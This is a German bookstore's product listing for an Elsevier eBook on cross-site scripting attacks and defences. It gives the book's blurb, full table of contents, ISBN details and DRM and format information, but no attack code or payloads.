XSS Attacks (eBook)
480 Seiten
Elsevier Science (Verlag)
978-0-08-055340-5 (ISBN)
*XSS Vulnerabilities exist in 8 out of 10 Web sites
*The authors of this book are the undisputed industry leading authorities
*Contains independent, bleeding edge research, code listings and exploits that can not be found anywhere else
A cross site scripting attack is a very specific type of attack on a web application. It is used by hackers to mimic real sites and fool people into providing personal data.XSS Attacks starts by defining the terms and laying out the ground work. It assumes that the reader is familiar with basic web programming (HTML) and JavaScript. First it discusses the concepts, methodology, and technology that makes XSS a valid concern. It then moves into the various types of XSS attacks, how they are implemented, used, and abused. After XSS is thoroughly explored, the next part provides examples of XSS malware and demonstrates real cases where XSS is a dangerous risk that exposes internet users to remote access, sensitive data theft, and monetary losses. Finally, the book closes by examining the ways developers can avoid XSS vulnerabilities in their web applications, and how users can avoid becoming a victim. The audience is web developers, security practitioners, and managers. XSS Vulnerabilities exist in 8 out of 10 Web sites The authors of this book are the undisputed industry leading authorities Contains independent, bleeding edge research, code listings and exploits that can not be found anywhere else
Front Cover 1
XSS Attacks: Cross Site Scripting Exploits and Defense 4
Copyright Page 5
Contents 10
Chapter 1. Cross-site Scripting Fundamentals 16
Introduction 17
Web Application Security 19
XML and AJAX Introduction 21
Summary 26
Solutions Fast Track 26
Frequently Asked Questions 27
Chapter 2. The XSS Discovery Toolkit 30
Introduction 31
Burp 31
Debugging DHTML With Firefox Extensions 36
Analyzing HTTP Traffic with Firefox Extensions 50
GreaseMonkey 61
Hacking with Bookmarklets 72
Using Technika 75
Summary 78
Solutions Fast Track 79
Frequently Asked Questions 80
Chapter 3. XSS Theory 82
Introduction 83
Getting XSS'ed 83
DOM-based XSS In Detail 90
Redirection 101
CSRF 108
Flash, QuickTime, PDE Oh My 112
HTTP Response Injection 138
Source vs. DHTML Reality 140
Bypassing XSS Length Limitations 146
XSS Filter Evasion 148
Summary 174
Solutions Fast Track 174
Frequently Asked Questions 177
Chapter 4. XSS Attack Methods 178
Introduction 179
History Stealing 179
Intranet Hacking 188
XSS Defacements 199
Summary 203
Solutions Fast Track 203
Frequently Asked Questions 204
References 205
Chapter 5. Advanced XSS Attack Vectors 206
Introduction 207
DNS Pinning 207
IMAP3 214
MHTML 219
Hacking JSON 224
Summary 231
Frequently Asked Questions 232
Chapter 6. XSS Exploited 234
Introduction 235
XSS vs. Firefox Password Manager 235
SeXXS Offenders 238
Equifraked 243
Owning the Cingular Xpress Mail User 247
Alternate XSS: Outside the BoXXS 263
XSS Old School- Windows Mobile PIE 4.2 277
XSSing Firefox Extensions 282
XSS Exploitation: Point-Click-Own with EZPhotoSales 300
Summary 303
Solutions Fast Track 303
Frequently Asked Questions 306
Chapter 7. Exploit Frameworks 308
Introduction 309
AttackAPI 309
BeEF 337
CAL9000 345
Overview of XSS-Proxy 353
Summary 386
Solutions Fast Track 386
Frequently Asked Questions 387
Chapter 8. XSS Worms 390
Introduction 391
Exponential XSS 391
XSS Warhol Worm 394
Linear XSS Worm 395
Samy Is My Hero 401
Summary 406
Solutions Fast Track 406
Frequently Asked Questions 408
Chapter 9. Preventing XSS Attacks 410
Introduction 411
Filtering 411
Input Encoding 415
Output Encoding 417
Web Browser's Security 417
Summary 421
Solutions Fast Track 421
Frequently Asked Questions 422
Appendix A The Owned List 424
Index 454
| Erscheint lt. Verlag | 18.4.2011 |
|---|---|
| Sprache | englisch |
| Themenwelt | Informatik ► Netzwerke ► Sicherheit / Firewall |
| Informatik ► Theorie / Studium ► Kryptologie | |
| Informatik ► Web / Internet ► Web Design / Usability | |
| ISBN-10 | 0-08-055340-0 / 0080553400 |
| ISBN-13 | 978-0-08-055340-5 / 9780080553405 |
| Haben Sie eine Frage zum Produkt? |
PDF (Adobe DRM)Größe: 65,7 MB
Kopierschutz: Adobe-DRM
Adobe-DRM ist ein Kopierschutz, der das eBook vor Mißbrauch schützen soll. Dabei wird das eBook bereits beim Download auf Ihre persönliche Adobe-ID autorisiert. Lesen können Sie das eBook dann nur auf den Geräten, welche ebenfalls auf Ihre Adobe-ID registriert sind.
Details zum Adobe-DRM
Dateiformat: PDF (Portable Document Format)
Mit einem festen Seitenlayout eignet sich die PDF besonders für Fachbücher mit Spalten, Tabellen und Abbildungen. Eine PDF kann auf fast allen Geräten angezeigt werden, ist aber für kleine Displays (Smartphone, eReader) nur eingeschränkt geeignet.
Systemvoraussetzungen:
PC/Mac: Mit einem PC oder Mac können Sie dieses eBook lesen. Sie benötigen eine
eReader: Dieses eBook kann mit (fast) allen eBook-Readern gelesen werden. Mit dem amazon-Kindle ist es aber nicht kompatibel.
Smartphone/Tablet: Egal ob Apple oder Android, dieses eBook können Sie lesen. Sie benötigen eine
Geräteliste und zusätzliche Hinweise
Buying eBooks from abroad
For tax law reasons we can sell eBooks just within Germany and Switzerland. Regrettably we cannot fulfill eBook-orders from other countries.
aus dem Bereich
